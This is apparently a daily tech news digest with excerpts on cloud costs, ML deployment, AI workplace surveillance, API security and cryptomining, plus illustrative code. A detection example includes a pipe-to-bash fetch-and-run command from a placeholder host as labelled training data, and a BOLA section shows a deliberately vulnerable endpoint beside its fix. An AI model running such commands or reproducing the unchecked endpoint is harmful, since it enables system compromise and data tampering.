In cloud computing, cost isn’t everything, but it’s pretty darn important. That’s why prospective customers really must look at cost options up front for all key services including compute, storage and networking. Outbound networking charges, in particular, have been a sore point for many, many early cloud customers. These “data egress” charges accrue when data is shipped out of a given cloud to the Internet and beyond. Virtually no cloud player charges for data streaming into its cloud from customers, but one first-generation provider notoriously starts the meter running after one GB of data ships out per month to the internet. Those dollars add up incredibly fast, leaving many customers shell shocked because they probably didn’t realize — or could not predict — how much data they might transfer at some point in the future. OCI, on the other hand, starts charging only after 10 TB of data ships out. This means our customers can transfer 10,000 times as much data with OCI as they could with the other provider, without paying a cent. 


Managers aren't worried about keeping their IT workers happy. That's bad for everyone

The lack of focus on employees is also highlighted in responses related to flexible work, NTT Data said: just 21% of executives rated flexible-working options as a top contributor to employee satisfaction – the lowest of any response. This flies in the face of the numerous reports that suggest that flexible-working options are not only important to employees, but something they would consider leaving their jobs over. According to global management consultancy McKinsey, some 15 million Americans have quit their jobs since April 2021. This trend is predicted to carry over into 2022. Research from analytics platform Qualtrics this month found that 65% of workers plan to remain with their employer next year, compared to 70% in 2021. The research was based on nearly 14,000 full-time employees across 27 countries. Workers in the tech industry appear even more likely to seek new opportunities in the coming months. In an October survey of 1,200 US tech and IT employees by TalentLMS and Workable, 72% said they intended to leave their job within the next 12 months.


Lambeq, a Toolkit for Quantum Natural Language Processing

NLP in quantum computing is a complex undertaking that moves from the sequential nature of the spoken word to something less one-dimensional. “The point is that humans evolved language after they evolved a mouth-hole for breathing and eating,” Coecke said. “This physical restriction forces us to speak one word at a time in sequence. This is how we write, too. However, the concepts that we express, the stories we tell, the information we convey to each other, form a dependency network whose connectivity is higher than one-dimensional. Even syntax trees … that you learn in school, that encode dependency information inside a sentence, are two-dimensional structures. Going further, connecting sentences together forms a large network of dependencies between meanings. Telling a story means doing a walk over this network, and this time-ordering gives rise to what I call a ‘language circuit.’” Quantum computers are better suited than classical systems for running NLP workloads, he said.
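
A short sketch with the open source lambeq toolkit, turning a sentence into a string diagram and then a parameterised quantum circuit; the API names follow later lambeq releases and may differ from the version current when this was written:

```python
from lambeq import AtomicType, BobcatParser, IQPAnsatz

parser = BobcatParser()
diagram = parser.sentence2diagram("Alice prefers quantum computers")

# Map the string diagram to a parameterised quantum circuit:
# one qubit per noun and sentence wire, one IQP layer.
ansatz = IQPAnsatz({AtomicType.NOUN: 1, AtomicType.SENTENCE: 1}, n_layers=1)
circuit = ansatz(diagram)
circuit.draw()
```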


Open Source Project Aims to Detect Living-Off-the-Land Attacks

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools. The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell. "The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. 
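
A generic illustration of the approach, not the project's actual code: derive human-inspired tags from a command line, then train a decision tree on them (the tag rules and two-sample training set are toys):

```python
import re
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.tree import DecisionTreeClassifier

def tags(cmd: str) -> str:
    out = []
    if re.search(r"\b(bash|sh|zsh)\b", cmd): out.append("spawns_shell")
    if re.search(r"\bpython[23]?\b", cmd):   out.append("python_binary")
    if "/tmp/" in cmd:                       out.append("tmp_path")
    if re.search(r"\b(curl|wget)\b", cmd):   out.append("network_fetch")
    return " ".join(out) or "no_tags"

cmds = ["curl http://x.example/p.sh | bash", "ls -la /home"]
labels = [1, 0]  # 1 = suspicious, 0 = benign (toy training data)
X = CountVectorizer().fit_transform(tags(c) for c in cmds)
clf = DecisionTreeClassifier().fit(X, labels)
```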


How to Start Cloud Application Development

The IT market is constantly changing, so it’s important to keep track of the most popular technologies. The StackOverflow survey provides detailed information about the most used scripting and markup languages. Among them are Java, Node.js, ASP.NET, and others used for back-end development. Another part of the survey gives statistics about the most popular JavaScript frameworks used for front-end development. As already mentioned, companies choose cloud application development to reduce costs, save time, and achieve high efficiency and high performance. Many IT industry giants have launched their own PaaS (Platform as a Service) products to provide ISVs and enterprises with reliable and secure cloud hosting. The choice is wide and can address the needs of cloud application development at any scale. Moreover, all of them have their own advantages and killer features. The choice of cloud services provider is as important as the choice of a back-end or front-end technology. Besides obvious things like cost, it affects how easy it will be for your DevOps team to work with, how scalable the app will be, and so on.


3 Ways to Deploy Machine Learning Models in Production

Most data science projects deploy machine learning models as an on-demand prediction service or in batch prediction mode. Some modern applications deploy embedded models in edge and mobile devices. Each approach has its own merits. For example, in the batch scenario, optimizations are done to minimize model compute cost. There are fewer dependencies on external data sources and cloud services. The local processing power is sometimes sufficient for computing algorithmically complex models. It is also easy to debug an offline model when failures occur, or to tune hyperparameters, since it runs on powerful servers. On the other hand, web services can provide cheaper and near real-time predictions. Availability of CPU power is less of an issue if the model runs on a cluster or cloud service. The model can be easily made available to other applications through API calls, and so on. One of the main benefits of embedded machine learning is that we can customize it to the requirements of a specific device.
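
For the on-demand case, a minimal prediction service might look like this; the model path and feature shape are assumptions for illustration:

```python
import pickle
from fastapi import FastAPI
from pydantic import BaseModel

app = FastAPI()
model = pickle.load(open("model.pkl", "rb"))  # trained offline, loaded once

class Features(BaseModel):
    values: list[float]

@app.post("/predict")
def predict(features: Features):
    # One prediction per request, near real time; scale by adding replicas.
    return {"prediction": model.predict([features.values]).tolist()[0]}

# Run with: uvicorn main:app --port 8000
```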


Council Post: AI Is Not Just Data Sciences

AI is no stranger to workplaces today. Fifty-three per cent of global leaders have integrated or are integrating AI into their workforce to enhance their business insights. While IDC has predicted that by 2022, 75% of enterprises will have embedded intelligent automation into technology and process development, the key aspect to consider is how and through which job roles organisations are going about incorporating AI in their workforce. Recent trends point towards broadening the scope of AI-driven roles in various parts of the workforce. This entails data science job roles spanning across the horizontal along with the vertical pillars of an organisation. With the increased integration of AI and Data Science teams in organisations, it is important for organisations and aspiring data science employees to understand the breadth of job roles. Many leaders are under the fallacy that AI and analytics can do with just data scientists, but the field is not limited to them. In fact, it is not even limited to engineers or individuals with a data science background. 


Convolutional Layers vs Fully Connected Layers

Deep learning is a field of research that has skyrocketed in the past few years with the increase in computational power and advances in model architectures. Two kinds of networks you’ll often hear about when reading about deep learning are fully connected neural nets (FCNNs) and convolutional neural nets (CNNs). These two are the basis of deep learning architectures, and almost all other deep learning neural networks stem from them. In this article I’ll first explain how fully connected layers work, then convolutional layers, and finally I’ll go through an example of a CNN. ... Neural networks are a set of dependent non-linear functions. Each individual function consists of a neuron (or a perceptron). In fully connected layers, the neuron applies a linear transformation to the input vector through a weights matrix. A non-linear transformation is then applied to the product through a non-linear activation function f.
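
A concrete way to see the difference is to count parameters: a fully connected layer computes f(Wx + b) with one weight per input-output pair, while a convolutional layer reuses one small kernel at every spatial position. A quick check with PyTorch:

```python
import torch.nn as nn

fc = nn.Linear(28 * 28, 100)           # 784*100 weights + 100 biases = 78,500
conv = nn.Conv2d(1, 8, kernel_size=3)  # 8*1*3*3 weights + 8 biases = 80

count = lambda m: sum(p.numel() for p in m.parameters())
print(count(fc), count(conv))          # 78500 vs 80 learnable parameters
```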



Quote for the day:

"Go after your dream, no matter how unattainable others think it is." -- Linda Mastandrea

Daily Tech Digest - November 13, 2021

New law needed to rein in AI-powered workplace surveillance

“AI offers invaluable opportunities to create new work and improve the quality of work if it is designed and deployed with this as an objective,” said the report. “However, we find that this potential is not currently being materialised. “Instead, a growing body of evidence points to significant negative impacts on the conditions and quality of work across the country. Pervasive monitoring and target-setting technologies, in particular, are associated with pronounced negative impacts on mental and physical wellbeing as workers experience the extreme pressure of constant, real-time micro-management and automated assessment.” The report added that a core source of workers’ anxiety around AI-powered monitoring is a “pronounced sense of unfairness and lack of agency” around the automated decisions made about them. “Workers do not understand how personal, and potentially sensitive, information is used to make decisions about the work that they do, and there is a marked absence of available routes to challenge or seek redress,” it said.


New Application Security Toolkit Uncovers Dependency Confusion Attacks

Application security teams will most likely implement the Dependency Combobulator at the CI level, says Moshe Zioni, vice-president of security research at Apiiro. For example, if the team uses Jenkins for its CI process, the toolkit may be used as part of the build process. Another place to use the toolkit would be during code commits and push requests, in which every change in dependency imports will be sent to the Dependency Combobulator for inspection and decision-making. “It can potentially be interconnected via a plugin but that's a more convoluted way that is not easily supported out of the box and will need some extra development work," Zioni says. There are numerous other tools that act similarly to Dependency Combobulator. Snyk offers snync, an open source tool to detect potential instances of dependency confusion in the code repository. Sonatype offers developers a dependency/namespace confusion checker script on GitHub which checks if a project has artifacts with the same name between repositories, and to determine whether the developer has been impacted by a dependency confusion attack in the past.
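
The core check such tools perform is easy to sketch for Python packages: does an internal dependency name also exist on the public registry, where an attacker could publish a higher version? (The package names below are hypothetical.)

```python
import requests

def exists_on_pypi(package: str) -> bool:
    r = requests.get(f"https://pypi.org/pypi/{package}/json", timeout=10)
    return r.status_code == 200

internal_deps = ["acme-billing-core", "acme-auth-utils"]  # hypothetical names
for dep in internal_deps:
    if exists_on_pypi(dep):
        print(f"{dep}: same name exists publicly - possible confusion risk")
```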


Managing the risks and returns of intelligent automation

Most companies do not yet have the appropriate structures and tools to effectively manage the risks and returns of intelligent automation. Specifically, different aspects of system development and operation (such as implementation and system management, risk and resilience management, and business-process optimization) are often managed by various functions in a fragmented way. Furthermore, organizations typically lack robust frameworks, processes, and infrastructure to ensure the effective risk and return assessment of AI and automation. It’s therefore increasingly critical for companies to incorporate automation-specific considerations into their broader AI- and digital-risk-management programs. To drive strategic decisions across the organization, institutions can create a holistic view of both the benefits and risks of intelligent automation—including where these tools touch critical processes and where there might be vulnerabilities. They also need to understand not only how to simplify and automate processes, but also how to systematically reduce risk and improve institutional resilience. For this purpose, five key tactical steps can be considered across the automation and AI life cycle.


Upgrading to Intel 12th-gen Alder Lake: Motherboard, cooler, and more

For performance, you have three options: The Core i9-12900K, Core i7-12700K, or Core i5-12600K. They scale down in performance and price, with the top chip sporting 16 cores for around $600 and the bottom 10 cores for around $300. All three chips are unlocked for overclocking, so you can push them beyond the rated clock speed. The KF-series processors are identical to their K-series counterparts. They come with the same number of cores, same boost clock, and same power limit. The only difference is that KF-series processors don’t include integrated graphics. All of these processors pair best with a discrete graphics card, so you can save a little bit of money by going with the KF-series model. If you’re focused on gaming, we recommend the Core i5-12600K most. It’s the best gaming processor you can buy right now, sporting a massive core count and solid clock speeds for a reasonable price. The Core i9-12900K is overkill for gaming, but its extra cores are excellent for content creation, as you can read in our Core i9-12900K review.


Why Pulsar Beats Kafka for a Scalable, Distributed Data Architecture

Software developers today prefer to work with open source. Open source makes it easier for developers to look at their components and use the right ones for their projects. Using a modular, flexible, open architecture not only enables the right mix of best-of-breed tools as the business – and the technology – evolves; it also simplifies the ability to scale. By taking a fully open source approach, developers can support their business goals more easily. In fact, companies using an open source software data stack are two times more likely to attribute more than 20 percent of their revenue to data and analytics, according to a recent research report by DataStax. When your developers have the option of using open source projects, they will pick the project that they think is best. This can lead to the issue of creating a level of consistency and cohesiveness in your data stack. Without some consistency of approach, managing the implementation will get harder as you scale. Building on the same set of platforms that carry out their work in the same way can lessen the overhead.


What Are CRM Integrations? Everything You Need To Know

A CRM system reaches its full potential when it’s connected with other applications and software. “CRM integration” is the act of connecting a CRM system with other systems, and simply means that a business’s customer data can be seamlessly integrated with third-party systems. These third-party systems might be unrelated to the CRM system, but the data they generate or use can make CRM work better, and vice versa. Integration will look quite different for different types of businesses. For some, it’s as simple as linking a CRM system with a few functions of a company website, which can be done via integrations already built into CRM software. However, more complex businesses will need to integrate a CRM platform with a variety of other systems, including ones that are equally or more complex, such as an ERP (enterprise resource planning) system. Most CRM system integrations require connecting through APIs (application programming interfaces). A tool called “integration platform as a service” (iPaaS) that facilitates information sharing between third-party systems has become common for performing CRM integrations.
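
As a flavor of what an API-level integration involves without an iPaaS, here is a hypothetical sync of one CRM contact into a billing system; the endpoints, fields, and auth scheme are all invented for illustration:

```python
import requests

CRM_API = "https://crm.example.com/api/v1"          # invented endpoints
BILLING_API = "https://billing.example.com/api/v1"

def sync_contact(contact_id: str, token: str):
    headers = {"Authorization": f"Bearer {token}"}
    contact = requests.get(f"{CRM_API}/contacts/{contact_id}",
                           headers=headers, timeout=10).json()
    payload = {"name": contact["full_name"], "email": contact["email"]}
    requests.post(f"{BILLING_API}/customers", json=payload,
                  headers=headers, timeout=10).raise_for_status()
```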


Leveraging social media background checks to balance friction and risk

Partly driving this trend is new legislation such as PSD2, the EU directive that mandates stronger fraud prevention checks to complete payments. Coming into full effect on 14 September 2019, the anti-fraud aspect of PSD2 is essentially equivalent to hitting every new shopper with a hardcore 3DS2 check, requiring more than one point of authentication from shoppers in a fashion similar to multi-factor authentication practices. What is now the established approach to deterring fraudsters at checkout relies on biometrics to verify users, including selfies combined with scans of ID documents, as well as voice, fingerprints and other data elements. For instance, we have seen such measures adopted by popular players in the fintech landscape, such as Revolut and the recently rebranded Wise. While, according to Visa, consumers have taken well to biometrics, with 61% finding them easier and 70% finding them faster than passwords in the context of payments and banking, their applications vary considerably, from a quick scan to time-consuming multi-layered requests that might even require the shopper to switch devices.


Quantum computing skills are hard to find. Here's how companies are tackling the shortage

Quantum computers operate on inherently different principles to classical computers, requiring a new approach to problem-solving and a workforce consisting of academic, technical, and businesses expertise. No one candidate is going to possess all of these. "It involves so many different skills: we need classical hardware engineers, we need software engineers, we need mathematicians, we need simulation and modelling experts," says Edmondson. "I think the challenge for us is, if we go to hire a classical engineer, they don't have the physics background; if we hire a physicist, they're not used to working with classical hardware engineering – analogue design is new to them." Another fundamental challenge for businesses is getting people interested in technical fields to begin with. Not only are fewer young people taking IT and STEM-related subjects at school, but research also suggests that younger generations aren't all too confident about their chances of landing a career in tech either.


In-person and hybrid meeting strategies in the COVID era

It is a mess. And it's not likely to change anytime soon. Business leadership has to plan as if this level of disruption will remain the new normal for the foreseeable future, because it probably will. In that context, how do we do meetings? Sure, we had the answer back at the beginning of COVID: We all just used Zoom or Teams. But now? Now we have some people in the office and some at home, and we still have to sync up and work through business challenges. Let's start with conference rooms. As it turns out, crammed conference room meetings weren't as prevalent as we may remember. Office planning company Density Inc. did some really interesting polling back in 2019, before the pandemic hit. Density found that, 76% of the time, conference rooms were used by four people or fewer. In fact, 36% of the time, conference rooms were used by just one person. I'm guilty of that. During my years working in an office, I camped out in a conference room as much as possible. My cube was noisy and there were constant drop-ins, but if I moved to a conference room, I could get some peace and quiet and get my writing or research done.


Pace of Cybercrime Evolution Is Accelerating, Europol Warns

Unfortunately, the cybercrime-as-a-service ecosystem makes a range of malicious services and tools available for easy access - including call center services, which not only cryptocurrency scammers but also ransomware operations continue to use to contact and pressure victims. Budding criminals, who may not have deep technical knowledge, can also purchase ready-to-use strains of ransomware and other malware, tap bulletproof hosting sites or rent botnets to aid their attacks, and seek guidance via cybercrime forums. To combat this, Europol notes that law enforcement agencies continue to target so-called "gray infrastructure" - services that are marketed by criminals to other criminals. "Gray infrastructure services include bulletproof hosters, rogue cryptocurrency exchanges and VPNs that provide safe havens for criminals," Europol says. While such services cannot always be disrupted, police have managed to take them down on numerous occasions.



Quote for the day:

"If you fuel your journey on the opinions of others, you are going to run out of gas." -- Steve Maraboli

Daily Tech Digest - November 12, 2021

Cryptocurrency's Climate Impact: What's Really Being Done About It?

The cryptomining picture continues to shift. In September 2021 China banned cryptocurrencies as well as all mining operations. China had been the top miner of digital coins -- with an array of companies operating in the space. The Chinese government cited a lack of transparency and anonymity in cryptocurrencies as primary reasons for the ban. Immediately, many of the miners began moving operations out of China, and now the US has emerged as the world’s top cryptomining country. But Mora says that operations are also flourishing in developing nations with few environmental controls and near-zero regulation. While cryptomining can conceivably be located anywhere -- including adjacent to sustainable energy sources such as a wind farm or hydroelectric facility -- this isn’t typically the case. “There is a clear pattern of cryptomining pairing with coal,” he states. Meanwhile, the cryptomining industry says it is taking major steps to reduce the footprint of cryptocurrencies and introduce green mining methods.


A Deep Dive On The Most Critical API Vulnerability — BOLA

Because one user can have multiple objects from the same resource (e.g. trips), some API endpoints need to know which object (e.g. a specific trip) the user wants to access. This is where the object ID comes into the picture. The client simply sends the ID of the object the user needs to access. For example, if a user had a great trip with a driver, they can choose the specific trip on the “trip history” view in the application and add a tip to it. The mobile client will then trigger an API call to “/api/trips/<trip_id>/add_tip” with the ID of the chosen trip. Modern applications handle many resources and expose many endpoints to access them. Hence, modern APIs expose many object IDs. Those IDs are an integral part of the REST standard and of modern applications. Exposing an object via its ID might be good software design practice, but once the client can specify the ID, it opens the door to a very dangerous vulnerability - BOLA (Broken Object Level Authorization). In BOLA, a user accesses objects they should not have access to by manipulating the IDs.
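
To make the flaw concrete, here is a minimal Flask sketch contrasting a BOLA-prone endpoint with one that enforces an ownership check. The in-memory store, the header-based "auth", and the route names are hypothetical stand-ins for a real application's equivalents.

```python
# A minimal sketch of BOLA and its fix. Everything here (the toy store,
# header-based user lookup, routes) is hypothetical illustration.
from flask import Flask, abort, jsonify, request

app = Flask(__name__)

# Toy in-memory store: trip_id -> owner and tip. Trip 102 belongs to user 2.
TRIPS = {101: {"user_id": 1, "tip": 0}, 102: {"user_id": 2, "tip": 0}}

def current_user_id() -> int:
    # Hypothetical: a real app would derive this from a session or JWT.
    return int(request.headers.get("X-User-Id", 0))

# Vulnerable: trusts the client-supplied trip_id with no ownership check,
# so user 1 can tamper with user 2's trip just by changing the ID.
@app.route("/api/trips/<int:trip_id>/add_tip", methods=["POST"])
def add_tip_vulnerable(trip_id: int):
    trip = TRIPS.get(trip_id)
    if trip is None:
        abort(404)
    trip["tip"] = request.json["amount"]
    return jsonify(status="ok")

# Fixed: verify the object actually belongs to the requesting user.
@app.route("/api/v2/trips/<int:trip_id>/add_tip", methods=["POST"])
def add_tip_fixed(trip_id: int):
    trip = TRIPS.get(trip_id)
    if trip is None or trip["user_id"] != current_user_id():
        abort(404)  # 404 rather than 403, to avoid confirming the ID exists
    trip["tip"] = request.json["amount"]
    return jsonify(status="ok")
```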


How Critical Event Management can ensure resilience in a hybrid world

While threats are always changing, it is becoming increasingly difficult to predict and respond to crises. In such unpredictable circumstances, a detailed emergency plan is vital for business continuity. Critical events can arise in any line of business and spread quickly throughout the entire organisation. With a good CEM strategy, organisations will be able to avoid this as the programme will be integrated across all business sectors and provide intelligence to analyse any potential threats and their impact. Not only will this enable effective, interdepartmental communications, but teams will have a more dynamic and consolidated view of threats. The automated functionality of CEM will assess and respond to threats and capture any valuable information for critical event reporting. This will contribute toward greater operational efficiency, reduced costs and better situational awareness and response visibility across the whole enterprise. When it comes to the evolving threat landscape, Critical Event Management can provide valuable security and assurance for organisations.


As technology pervades, CIOs’ influence on business strategy grows

While CIOs continue to deliver the core IT services that power day-to-day business operations, they are also often expected to help drive innovation and business growth. Many surveyed CIOs emphasized the importance of data and automation to break down silos and create new value streams. ... Hybrid cloud is a key underpinning for AI-powered intelligent workflows. The number of CIOs surveyed reporting high maturity in their hybrid cloud operations increased 700% compared to 2019. The IBV’s recent study on cloud transformation provides further insight on how hybrid cloud is becoming the dominant IT architecture. Many CIOs are also looking to use technology to drive progress against corporate objectives like sustainability. 42% of CIOs surveyed expect technology to have a significant impact on sustainability in the next three years – the highest of any area of impact. ... The consequences of this disconnect can be significant – if CIOs and CTOs are using data and AI for different use cases without coordination across culture, processes and tools, the organization may lack a cross-company view and the ability to govern critical data properly.


Handling Missing data in Machine Learning

There are a variety of reasons that may lead to missing data, such as data corruption, lack of data availability during certain time periods, or bias in the data collection process (e.g. certain categories of respondents in a survey leave an answer blank). The important distinction to make here is whether or not your missing data is occurring at random. There are three categories of scenarios for missing data, illustrated in the sketch that follows:

Missing completely at random (MCAR) - The probability of data being missing is equal for all possible data points.

Missing at random (MAR) - The probability of data being missing is not equal across all data points, but within known classes of data, the probability of missing data is equal. For example, the probability of data being missing could be equal only within responses from a given country.

Missing not at random (MNAR) - The probability of data being missing is not equal across all data points, and there is no known grouping of data within which missing data is equally probable.
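
A minimal numpy/pandas sketch (the survey columns and missingness rates are invented for illustration) that simulates MCAR and MAR missingness and shows why, under MAR, imputing within the known classes is more defensible than a single global fill:

```python
# Hypothetical survey data: simulate MCAR and MAR missingness, then impute.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
n = 1_000
df = pd.DataFrame({
    "country": rng.choice(["US", "DE"], size=n),
    "income": rng.normal(50_000, 10_000, size=n),
})

# MCAR: every value has the same 10% chance of being missing.
df["income_mcar"] = df["income"].mask(rng.random(n) < 0.10)

# MAR: missingness depends on a *known* column (country) -- 25% of German
# respondents leave income blank, versus 5% of US respondents.
p_missing = np.where(df["country"] == "DE", 0.25, 0.05)
df["income_mar"] = df["income"].mask(rng.random(n) < p_missing)

# Under MAR, impute within each known class (per country) rather than
# filling every gap with one global mean.
df["income_imputed"] = df.groupby("country")["income_mar"].transform(
    lambda s: s.fillna(s.mean())
)
print(df[["income_mcar", "income_mar", "income_imputed"]].isna().mean())
```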


Nvidia intros AI Omniverse Avatar generator for enterprises

"As more enterprises deploy and manage hundreds and thousands of models in production, accelerated infrastructures like Triton will be crucial in maximizing throughput, minimizing latency and accelerating deployment velocity," he said. The new inference feature set includes new models and an analyzer to help enterprises understand how to optimize their AI models to run on a variety of different platforms. The analyzer searches the areas between all the different GPUs and CPU options as well as all the different concurrency paths, and meets the required latency for picking the right model, said Ian Buck, general manager at Nvidia, during a media briefing. "The right accuracy, the right amount of batching and the right hardware platform to get the maximum performance out of your infrastructure," he said. The new version of Triton also supports multi-GPU multi-node inference and forced inference library, also known as RAPIDS FIL. RAPIDS FIL is a new back end for GPU or CPU inferencing of decision tree models. 


Cut me some Slack: the poor data practices threatening modern business

Remote working has brought many productivity benefits for office workers across the country, and these benefits are likely here to stay, with the Department for Business, Energy & Industrial Strategy consulting on making flexible working the default. But there have also been some drawbacks to remote working for businesses navigating these new waters. As personal and corporate worlds collide, many organisations may find that their data is at risk of being shared on unsecured networks and on unofficial communications channels. And no organisation is shielded from this danger. A former national security official recently spoke candidly about UK senior ministers not following policy and opening sensitive government data to cyber-attacks. This comes two years after suspected Russian cybercriminals stole the entire cache of messages from a former cabinet minister’s email account. Communication weaknesses, across all levels of seniority, are a real cause for concern, especially when valuable information is at stake.


The 10 Commandments for Designing a Data Science Project

Understand that defining a problem and obtaining data does not mean that the problem can be solved. Think about current solutions, what kind of data you have, and the desired result. Could a human solve this problem using the same data given infinite time? If not, it’s likely that the problem can’t be solved using machine learning. When in doubt, consult a colleague. In the financial world, account balance prediction is an oft-requested solution, but no person or computer could tell you what your finances will be like over the coming months. Think of when the pandemic hit; millions of people unexpectedly lost their jobs. What about when there’s a house burglary and items need to be replaced? These are things that neither a human nor an algorithm can predict. The ultimate goal of any problem is to satisfy the needs of the end user by providing an appropriate solution that reduces their workload. By knowing what the end user currently has and what they lack, you can aim towards the best solution from the get-go. 


4 Strategies to Manage Freelancers with In-House Dev Teams

Freelancers and remote workers are often less exposed to the wider business context in which they are developing products and features. This can make it harder to assess and optimize their output from the viewpoint of an end user. Just as importantly, it can make it less clear what the other members of the team are working on and how their output affects their colleagues’ work. “Without consistent feedback, even the most talented developers in a team can invest a lot of time in a non-feasible solution. An ongoing feedback loop is one of the best ways to support a team and enable them to put their skills to use,” said Irene Avdus, a product manager at TextMagic, which has offices in multiple countries and which regularly brings on freelance talent. Giving freelancers and remote workers consistent and regular feedback doesn’t just help them improve their output for a better end result. It also helps them to fit in with the workflow of the rest of the team, enabling the project to go more smoothly for everyone.


IT careers: 5 steps to get hired before the holidays

The most common mistake people make is using one resume to apply for different roles. This is like wearing your workout gear for everything you do, from hiking to attending board meetings and even weddings. You may be more comfortable and it’s certainly easier, but it doesn’t make sense, and others won’t take you seriously. Similarly, you need different versions of your resume based on the different jobs you want to apply for. For example, a marketing position will need a different resume than a sales position. Highlight the skills and experiences most relevant to the role. Limit your resume to one page (two at the most). Recruiters and managers spend less than 30 seconds skimming resumes, and the shorter and more relevant yours is, the better your chances of grabbing their attention. Add keywords specific to the roles you are applying for in your resume. Hiring managers look for these specific terms to ensure candidates are the right fit. One way to find relevant keywords is to search for existing job descriptions that are similar to the position you want. Finally, versioning may help you keep track of which resume you sent to which job.



Quote for the day:

"Real leadership is being the person others will gladly and confidently follow." -- John C. Maxwell